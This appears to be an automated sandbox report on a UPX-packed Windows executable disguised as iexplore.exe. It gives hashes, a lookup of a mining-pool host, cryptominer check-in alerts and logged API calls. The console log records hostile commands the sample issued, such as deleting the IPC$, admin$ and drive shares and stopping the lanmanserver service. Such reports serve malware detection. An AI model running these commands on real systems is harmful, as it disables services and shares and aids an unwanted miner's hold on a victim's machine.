popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

iexplore.exe

Generic Malware UPX Antivirus Malicious Library Malicious Packer PE64 OS Processor Check PE32 PE File
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6403_us June 5, 2023, 5:52 p.m. June 5, 2023, 5:55 p.m.
Size 3.9MB
Type PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
MD5 a3d8b7059f0a4108d38144586fd63ee0
SHA256 fc82ae233202ce00335a22ad605fa184687db2023b8bdb8afbb4fd7cd61a8e52
CRC32 2914A370
ssdeep 98304:kVT8nSXdIs4DzUQeArdcHL9NlTxoUx2ZXOR6wwYIvtQZZuvIsGr:keSXdY/aAm9NRx28cfhvtPY
Yara
  • UPX_Zero - UPX packed file
  • PE_Header_Zero - PE File Signature
  • IsPE32 - (no description)

Name Response Post-Analysis Lookup
x.f2pool.info
A 183.111.205.12
183.111.205.12
IP Address Status Action
164.124.101.2 Active Moloch
183.111.205.12 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.103:49199 -> 183.111.205.12:1230 2024792 ET POLICY Cryptocurrency Miner Checkin Potential Corporate Privacy Violation
TCP 192.168.56.103:49199 -> 183.111.205.12:1230 2024792 ET POLICY Cryptocurrency Miner Checkin Potential Corporate Privacy Violation

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

 buffer: The operation completed successfully.
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: The operation completed successfully.
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: The operation completed successfully.
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: The operation completed successfully.
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: ERROR:
console_handle: 0x0000000b
1 1 0

WriteConsoleW

 buffer: The system was unable to find the specified registry key or value.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

 buffer: ERROR:
console_handle: 0x0000000b
1 1 0

WriteConsoleW

 buffer: The system was unable to find the specified registry key or value.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

 buffer: [SC] OpenService FAILED 1060: The specified service does not exist as an installed service.
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: [SC] OpenService FAILED 1060: The specified service does not exist as an installed service.
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: [SC] OpenService FAILED 1060: The specified service does not exist as an installed service.
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: [SC] OpenService FAILED 1060: The specified service does not exist as an installed service.
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: [SC] OpenService FAILED 1060: The specified service does not exist as an installed service.
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: [SC] OpenService FAILED 1060: The specified service does not exist as an installed service.
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: [SC] OpenService FAILED 1060: The specified service does not exist as an installed service.
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: [SC] OpenService FAILED 1060: The specified service does not exist as an installed service.
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: ERROR: The process "d1lhots.exe" not found.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

 buffer: ERROR: The process "rundlls.exe" not found.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

 buffer: ERROR: The process "dl1hots.exe" not found.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

 buffer: The user name could not be found.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

 buffer: More help is available by typing NET HELPMSG 2221.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

 buffer: The user name could not be found.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

 buffer: More help is available by typing NET HELPMSG 2221.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

 buffer: [SC] OpenService FAILED 1060: The specified service does not exist as an installed service.
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: [SC] OpenService FAILED 1060: The specified service does not exist as an installed service.
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: The service name is invalid.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

 buffer: More help is available by typing NET HELPMSG 2185.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

 buffer: The service name is invalid.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

 buffer: More help is available by typing NET HELPMSG 2185.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

 buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: net
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: share iPC$ /delete
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: net
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: share admin$ /delete
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: net
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: share c$ /delete
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: net
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: share d$ /delete
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: net
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: share e$ /delete
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: net
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: share f$ /delete
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: net
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: stop lanmanserver /y
console_handle: 0x00000007
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
resource name TEXTINCLUDE
Time & API Arguments Status Return Repeated

__exception__

 stacktrace: 
RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x754c374b
CoReleaseServerProcess+0x73 OleSaveToStream-0xad ole32+0x64387 @ 0x75b94387
NdrpMemoryIncrement+0x3d1 NdrComplexStructMarshall-0x2f rpcrt4+0x1ef51 @ 0x754bef51
NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x754b6a9c
NdrPointerMarshall+0xd6 NdrPointerBufferSize-0x10 rpcrt4+0x16b42 @ 0x754b6b42
NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x754b6a9c
NdrConformantArrayFree+0x8c NdrOleFree-0xa rpcrt4+0x35c3a @ 0x754d5c3a
NdrStubCall2+0x31d NdrUnmarshallBasetypeInline-0x23a rpcrt4+0xb06b8 @ 0x755506b8
WdtpInterfacePointer_UserUnmarshal+0x256f DllDebugObjectRPCHook-0x1e89 ole32+0x13d7e6 @ 0x75c6d7e6
WdtpInterfacePointer_UserUnmarshal+0x25ff DllDebugObjectRPCHook-0x1df9 ole32+0x13d876 @ 0x75c6d876
WdtpInterfacePointer_UserUnmarshal+0x2b59 DllDebugObjectRPCHook-0x189f ole32+0x13ddd0 @ 0x75c6ddd0
CoTaskMemFree+0x1b02 DcomChannelSetHResult-0x1c8 ole32+0x58a43 @ 0x75b88a43
CoTaskMemFree+0x19f7 DcomChannelSetHResult-0x2d3 ole32+0x58938 @ 0x75b88938
DcomChannelSetHResult+0x8ff CoGetObject-0x2183 ole32+0x5950a @ 0x75b8950a
WdtpInterfacePointer_UserUnmarshal+0x2a56 DllDebugObjectRPCHook-0x19a2 ole32+0x13dccd @ 0x75c6dccd
WdtpInterfacePointer_UserUnmarshal+0x28ca DllDebugObjectRPCHook-0x1b2e ole32+0x13db41 @ 0x75c6db41
WdtpInterfacePointer_UserUnmarshal+0x2f86 DllDebugObjectRPCHook-0x1472 ole32+0x13e1fd @ 0x75c6e1fd
DcomChannelSetHResult+0x75c CoGetObject-0x2326 ole32+0x59367 @ 0x75b89367
DcomChannelSetHResult+0x71b CoGetObject-0x2367 ole32+0x59326 @ 0x75b89326
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755f62fa
GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x755f6d3a
CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x755f77c4
DispatchMessageW+0xf GetMessageW-0x58 user32+0x1788a @ 0x755f788a
CoWaitForMultipleHandles+0x4311 CoRegisterSurrogateEx-0x2fe ole32+0x1a48b @ 0x75b4a48b
CoWaitForMultipleHandles+0x23c1 CoRegisterSurrogateEx-0x224e ole32+0x1853b @ 0x75b4853b
CoWaitForMultipleHandles+0x4332 CoRegisterSurrogateEx-0x2dd ole32+0x1a4ac @ 0x75b4a4ac
CoGetTreatAsClass+0x2619 CoRegisterChannelHook-0x1269 ole32+0x2cd48 @ 0x75b5cd48
CoGetTreatAsClass+0x314b CoRegisterChannelHook-0x737 ole32+0x2d87a @ 0x75b5d87a
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155
exception.offset: 46887
exception.address: 0x7559b727
registers.esp: 41873596
registers.edi: 4642244
registers.eax: 41873596
registers.ebp: 41873676
registers.edx: 49
registers.ebx: 41873960
registers.esi: 2147746133
registers.ecx: 4416872
1 0 0

__exception__

 stacktrace: 
RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x754c374b
DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x75c6f725
NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x754d414b
ObjectStublessClient25+0x65c CoImpersonateClient-0xbc ole32+0xfe14 @ 0x75b3fe14
StgGetIFillLockBytesOnFile+0x16ab5 WdtpInterfacePointer_UserSize-0xe21 ole32+0x13a338 @ 0x75c6a338
IsValidURL+0x4b8c MkParseDisplayNameEx-0x1c6a4 urlmon+0x4e99f @ 0x7532e99f
IntlPercentEncodeNormalize+0x1ff8 CoInternetCombineIUri-0x940 urlmon+0x272ed @ 0x753072ed
RegisterBindStatusCallback+0x40d9 CopyBindInfo-0xbe4 urlmon+0x1ab0d @ 0x752fab0d
IsValidURL+0x2235 MkParseDisplayNameEx-0x1effb urlmon+0x4c048 @ 0x7532c048
RegisterBindStatusCallback+0x1dc3 CopyBindInfo-0x2efa urlmon+0x187f7 @ 0x752f87f7
RegisterBindStatusCallback+0x1ef2 CopyBindInfo-0x2dcb urlmon+0x18926 @ 0x752f8926
RevokeBindStatusCallback+0x13ad CreateURLMoniker-0x4b1 urlmon+0x1d55e @ 0x752fd55e
IsValidURL+0x2638 MkParseDisplayNameEx-0x1ebf8 urlmon+0x4c44b @ 0x7532c44b
RevokeBindStatusCallback+0x1045 CreateURLMoniker-0x819 urlmon+0x1d1f6 @ 0x752fd1f6
RevokeBindStatusCallback+0xffb CreateURLMoniker-0x863 urlmon+0x1d1ac @ 0x752fd1ac
RevokeBindStatusCallback+0x125a CreateURLMoniker-0x604 urlmon+0x1d40b @ 0x752fd40b
RegisterBindStatusCallback+0x2ee7 CopyBindInfo-0x1dd6 urlmon+0x1991b @ 0x752f991b
RegisterBindStatusCallback+0x2333 CopyBindInfo-0x298a urlmon+0x18d67 @ 0x752f8d67
RegisterBindStatusCallback+0x36a4 CopyBindInfo-0x1619 urlmon+0x1a0d8 @ 0x752fa0d8
RegisterBindStatusCallback+0x3151 CopyBindInfo-0x1b6c urlmon+0x19b85 @ 0x752f9b85
RegisterBindStatusCallback+0x3074 CopyBindInfo-0x1c49 urlmon+0x19aa8 @ 0x752f9aa8
DllRegisterServer+0x14b2 msxml3+0x46f4f @ 0x73db6f4f
DllRegisterServer+0x13a3 msxml3+0x46e40 @ 0x73db6e40
DllGetClassObject+0x3536b DllCanUnloadNow-0x1017 msxml3+0x427a4 @ 0x73db27a4
DllGetClassObject+0x35219 DllCanUnloadNow-0x1169 msxml3+0x42652 @ 0x73db2652
DllGetClassObject+0x35104 DllCanUnloadNow-0x127e msxml3+0x4253d @ 0x73db253d
DllGetClassObject+0x34fd8 DllCanUnloadNow-0x13aa msxml3+0x42411 @ 0x73db2411
DllGetClassObject+0x35172 DllCanUnloadNow-0x1210 msxml3+0x425ab @ 0x73db25ab
wmic+0x39c80 @ 0x709c80
wmic+0x3b06a @ 0x70b06a
wmic+0x3b1f8 @ 0x70b1f8
wmic+0x36fcd @ 0x706fcd
wmic+0x3d6e9 @ 0x70d6e9
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155
exception.offset: 46887
exception.address: 0x7559b727
registers.esp: 650112
registers.edi: 1974991376
registers.eax: 650112
registers.ebp: 650192
registers.edx: 1
registers.ebx: 4386188
registers.esi: 2147746133
registers.ecx: 2142574580
1 0 0

__exception__

 stacktrace: 
RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x754c374b
CoReleaseServerProcess+0x73 OleSaveToStream-0xad ole32+0x64387 @ 0x75b94387
NdrpMemoryIncrement+0x3d1 NdrComplexStructMarshall-0x2f rpcrt4+0x1ef51 @ 0x754bef51
NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x754b6a9c
NdrPointerMarshall+0xd6 NdrPointerBufferSize-0x10 rpcrt4+0x16b42 @ 0x754b6b42
NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x754b6a9c
NdrConformantArrayFree+0x8c NdrOleFree-0xa rpcrt4+0x35c3a @ 0x754d5c3a
NdrStubCall2+0x31d NdrUnmarshallBasetypeInline-0x23a rpcrt4+0xb06b8 @ 0x755506b8
WdtpInterfacePointer_UserUnmarshal+0x256f DllDebugObjectRPCHook-0x1e89 ole32+0x13d7e6 @ 0x75c6d7e6
WdtpInterfacePointer_UserUnmarshal+0x25ff DllDebugObjectRPCHook-0x1df9 ole32+0x13d876 @ 0x75c6d876
WdtpInterfacePointer_UserUnmarshal+0x2b59 DllDebugObjectRPCHook-0x189f ole32+0x13ddd0 @ 0x75c6ddd0
CoTaskMemFree+0x1b02 DcomChannelSetHResult-0x1c8 ole32+0x58a43 @ 0x75b88a43
CoTaskMemFree+0x19f7 DcomChannelSetHResult-0x2d3 ole32+0x58938 @ 0x75b88938
DcomChannelSetHResult+0x8ff CoGetObject-0x2183 ole32+0x5950a @ 0x75b8950a
WdtpInterfacePointer_UserUnmarshal+0x2a56 DllDebugObjectRPCHook-0x19a2 ole32+0x13dccd @ 0x75c6dccd
WdtpInterfacePointer_UserUnmarshal+0x28ca DllDebugObjectRPCHook-0x1b2e ole32+0x13db41 @ 0x75c6db41
WdtpInterfacePointer_UserUnmarshal+0x2f86 DllDebugObjectRPCHook-0x1472 ole32+0x13e1fd @ 0x75c6e1fd
DcomChannelSetHResult+0x75c CoGetObject-0x2326 ole32+0x59367 @ 0x75b89367
DcomChannelSetHResult+0x71b CoGetObject-0x2367 ole32+0x59326 @ 0x75b89326
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755f62fa
GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x755f6d3a
CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x755f77c4
DispatchMessageW+0xf GetMessageW-0x58 user32+0x1788a @ 0x755f788a
CoWaitForMultipleHandles+0x4311 CoRegisterSurrogateEx-0x2fe ole32+0x1a48b @ 0x75b4a48b
CoWaitForMultipleHandles+0x23c1 CoRegisterSurrogateEx-0x224e ole32+0x1853b @ 0x75b4853b
CoWaitForMultipleHandles+0x4332 CoRegisterSurrogateEx-0x2dd ole32+0x1a4ac @ 0x75b4a4ac
CoGetTreatAsClass+0x2619 CoRegisterChannelHook-0x1269 ole32+0x2cd48 @ 0x75b5cd48
CoGetTreatAsClass+0x314b CoRegisterChannelHook-0x737 ole32+0x2d87a @ 0x75b5d87a
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155
exception.offset: 46887
exception.address: 0x7559b727
registers.esp: 47640568
registers.edi: 4902276
registers.eax: 47640568
registers.ebp: 47640648
registers.edx: 49
registers.ebx: 47640932
registers.esi: 2147746133
registers.ecx: 4679056
1 0 0

__exception__

 stacktrace: 
RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x754c374b
DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x75c6f725
NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x754d414b
ObjectStublessClient25+0x65c CoImpersonateClient-0xbc ole32+0xfe14 @ 0x75b3fe14
StgGetIFillLockBytesOnFile+0x16ab5 WdtpInterfacePointer_UserSize-0xe21 ole32+0x13a338 @ 0x75c6a338
IsValidURL+0x4b8c MkParseDisplayNameEx-0x1c6a4 urlmon+0x4e99f @ 0x7532e99f
IntlPercentEncodeNormalize+0x1ff8 CoInternetCombineIUri-0x940 urlmon+0x272ed @ 0x753072ed
RegisterBindStatusCallback+0x40d9 CopyBindInfo-0xbe4 urlmon+0x1ab0d @ 0x752fab0d
IsValidURL+0x2235 MkParseDisplayNameEx-0x1effb urlmon+0x4c048 @ 0x7532c048
RegisterBindStatusCallback+0x1dc3 CopyBindInfo-0x2efa urlmon+0x187f7 @ 0x752f87f7
RegisterBindStatusCallback+0x1ef2 CopyBindInfo-0x2dcb urlmon+0x18926 @ 0x752f8926
RevokeBindStatusCallback+0x13ad CreateURLMoniker-0x4b1 urlmon+0x1d55e @ 0x752fd55e
IsValidURL+0x2638 MkParseDisplayNameEx-0x1ebf8 urlmon+0x4c44b @ 0x7532c44b
RevokeBindStatusCallback+0x1045 CreateURLMoniker-0x819 urlmon+0x1d1f6 @ 0x752fd1f6
RevokeBindStatusCallback+0xffb CreateURLMoniker-0x863 urlmon+0x1d1ac @ 0x752fd1ac
RevokeBindStatusCallback+0x125a CreateURLMoniker-0x604 urlmon+0x1d40b @ 0x752fd40b
RegisterBindStatusCallback+0x2ee7 CopyBindInfo-0x1dd6 urlmon+0x1991b @ 0x752f991b
RegisterBindStatusCallback+0x2333 CopyBindInfo-0x298a urlmon+0x18d67 @ 0x752f8d67
RegisterBindStatusCallback+0x36a4 CopyBindInfo-0x1619 urlmon+0x1a0d8 @ 0x752fa0d8
RegisterBindStatusCallback+0x3151 CopyBindInfo-0x1b6c urlmon+0x19b85 @ 0x752f9b85
RegisterBindStatusCallback+0x3074 CopyBindInfo-0x1c49 urlmon+0x19aa8 @ 0x752f9aa8
DllRegisterServer+0x14b2 msxml3+0x46f4f @ 0x73d36f4f
DllRegisterServer+0x13a3 msxml3+0x46e40 @ 0x73d36e40
DllGetClassObject+0x3536b DllCanUnloadNow-0x1017 msxml3+0x427a4 @ 0x73d327a4
DllGetClassObject+0x35219 DllCanUnloadNow-0x1169 msxml3+0x42652 @ 0x73d32652
DllGetClassObject+0x35104 DllCanUnloadNow-0x127e msxml3+0x4253d @ 0x73d3253d
DllGetClassObject+0x34fd8 DllCanUnloadNow-0x13aa msxml3+0x42411 @ 0x73d32411
DllGetClassObject+0x35172 DllCanUnloadNow-0x1210 msxml3+0x425ab @ 0x73d325ab
wmic+0x39c80 @ 0x7f9c80
wmic+0x3b06a @ 0x7fb06a
wmic+0x3b1f8 @ 0x7fb1f8
wmic+0x36fcd @ 0x7f6fcd
wmic+0x3d6e9 @ 0x7fd6e9
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155
exception.offset: 46887
exception.address: 0x7559b727
registers.esp: 1828416
registers.edi: 1974991376
registers.eax: 1828416
registers.ebp: 1828496
registers.edx: 1
registers.ebx: 4648380
registers.esi: 2147746133
registers.ecx: 2004483684
1 0 0

__exception__

 stacktrace: 
RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x754c374b
CoReleaseServerProcess+0x73 OleSaveToStream-0xad ole32+0x64387 @ 0x75b94387
NdrpMemoryIncrement+0x3d1 NdrComplexStructMarshall-0x2f rpcrt4+0x1ef51 @ 0x754bef51
NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x754b6a9c
NdrPointerMarshall+0xd6 NdrPointerBufferSize-0x10 rpcrt4+0x16b42 @ 0x754b6b42
NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x754b6a9c
NdrConformantArrayFree+0x8c NdrOleFree-0xa rpcrt4+0x35c3a @ 0x754d5c3a
NdrStubCall2+0x31d NdrUnmarshallBasetypeInline-0x23a rpcrt4+0xb06b8 @ 0x755506b8
WdtpInterfacePointer_UserUnmarshal+0x256f DllDebugObjectRPCHook-0x1e89 ole32+0x13d7e6 @ 0x75c6d7e6
WdtpInterfacePointer_UserUnmarshal+0x25ff DllDebugObjectRPCHook-0x1df9 ole32+0x13d876 @ 0x75c6d876
WdtpInterfacePointer_UserUnmarshal+0x2b59 DllDebugObjectRPCHook-0x189f ole32+0x13ddd0 @ 0x75c6ddd0
CoTaskMemFree+0x1b02 DcomChannelSetHResult-0x1c8 ole32+0x58a43 @ 0x75b88a43
CoTaskMemFree+0x19f7 DcomChannelSetHResult-0x2d3 ole32+0x58938 @ 0x75b88938
DcomChannelSetHResult+0x8ff CoGetObject-0x2183 ole32+0x5950a @ 0x75b8950a
WdtpInterfacePointer_UserUnmarshal+0x2a56 DllDebugObjectRPCHook-0x19a2 ole32+0x13dccd @ 0x75c6dccd
WdtpInterfacePointer_UserUnmarshal+0x28ca DllDebugObjectRPCHook-0x1b2e ole32+0x13db41 @ 0x75c6db41
WdtpInterfacePointer_UserUnmarshal+0x2f86 DllDebugObjectRPCHook-0x1472 ole32+0x13e1fd @ 0x75c6e1fd
DcomChannelSetHResult+0x75c CoGetObject-0x2326 ole32+0x59367 @ 0x75b89367
DcomChannelSetHResult+0x71b CoGetObject-0x2367 ole32+0x59326 @ 0x75b89326
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755f62fa
GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x755f6d3a
CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x755f77c4
DispatchMessageW+0xf GetMessageW-0x58 user32+0x1788a @ 0x755f788a
CoWaitForMultipleHandles+0x4311 CoRegisterSurrogateEx-0x2fe ole32+0x1a48b @ 0x75b4a48b
CoWaitForMultipleHandles+0x23c1 CoRegisterSurrogateEx-0x224e ole32+0x1853b @ 0x75b4853b
CoWaitForMultipleHandles+0x4332 CoRegisterSurrogateEx-0x2dd ole32+0x1a4ac @ 0x75b4a4ac
CoGetTreatAsClass+0x2619 CoRegisterChannelHook-0x1269 ole32+0x2cd48 @ 0x75b5cd48
CoGetTreatAsClass+0x314b CoRegisterChannelHook-0x737 ole32+0x2d87a @ 0x75b5d87a
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155
exception.offset: 46887
exception.address: 0x7559b727
registers.esp: 32634048
registers.edi: 3140820
registers.eax: 32634048
registers.ebp: 32634128
registers.edx: 49
registers.ebx: 32634412
registers.esi: 2147746133
registers.ecx: 2909584
1 0 0

__exception__

 stacktrace: 
RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x754c374b
DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x75c6f725
NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x754d414b
ObjectStublessClient25+0x65c CoImpersonateClient-0xbc ole32+0xfe14 @ 0x75b3fe14
StgGetIFillLockBytesOnFile+0x16ab5 WdtpInterfacePointer_UserSize-0xe21 ole32+0x13a338 @ 0x75c6a338
IsValidURL+0x4b8c MkParseDisplayNameEx-0x1c6a4 urlmon+0x4e99f @ 0x7532e99f
IntlPercentEncodeNormalize+0x1ff8 CoInternetCombineIUri-0x940 urlmon+0x272ed @ 0x753072ed
RegisterBindStatusCallback+0x40d9 CopyBindInfo-0xbe4 urlmon+0x1ab0d @ 0x752fab0d
IsValidURL+0x2235 MkParseDisplayNameEx-0x1effb urlmon+0x4c048 @ 0x7532c048
RegisterBindStatusCallback+0x1dc3 CopyBindInfo-0x2efa urlmon+0x187f7 @ 0x752f87f7
